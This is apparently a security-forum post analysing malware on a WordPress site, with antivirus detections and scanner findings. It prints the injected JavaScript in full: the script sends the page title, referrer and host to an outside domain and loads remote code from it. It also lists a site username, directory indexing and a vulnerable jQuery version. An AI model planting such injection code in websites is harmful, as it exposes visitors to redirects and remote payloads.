Avast one of the few to detect this malware...

Read on this malware: http://istartblogging.com/wordpress-malware-fix-organic-traffic-redirect-hack/
See: https://www.virustotal.com/en/url/d6bdec5fab4419806fd590d1af0ade061ed8c04cb01f0a48130cf5e11943dda4/analysis/1454685539/
See: https://www.virustotal.com/en/file/dadf09ed44e7fb92f8012e217b933997bdeede70a3c7250474e8364c53353aea/analysis/1454627267/ Avast detects this as JS:Injection-A [Trj]
Detected; Known javascript malware. Details: http://sucuri.net/malware/entry/MW:JS:GEN2?web.js.malware.fake_jquery.001


<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "hxtp://diehardhockey.ca/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>

Web application details:
Application: WordPress 4.4.2 - http://www.wordpress.org

Web application version:
WordPress version: WordPress 4.4.2
Wordpress version from source: 4.4.2
WordPress theme: -http://deskcred.com/wp-content/themes/layerswp/
Wordpress internal path: /home3/creasy54/public_html/deskcred.com/wp-content/themes/layerswp/index.php

Warning User Enumeration is possible - ID User Login
1 christof christof

Warning Directory Indexing Enabled

In the test we attempted to list the directory contents of the uploads and plugins folders to determine if Directory Indexing is enabled. This is an information leakage vulnerability that can reveal sensitive information regarding your site configuration or content.

/wp-content/uploads/ enabled

Detected libraries:
jquery-migrate - 1.2.1 : -http://deskcred.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1
Info: Severity: medium
http://bugs.jquery.com/ticket/11290
http://research.insecurelabs.org/jquery/test/
jquery - 1.11.3 : (active1) -http://deskcred.com/wp-includes/js/jquery/jquery.js?ver=1.11.3
(active) - the library was also found to be active by running code
1 vulnerable library detected

Here the malware is completely mised: http://zulu.zscaler.com/submission/show/1ac59173a0be96180263595b5301a757-1454685662

polonus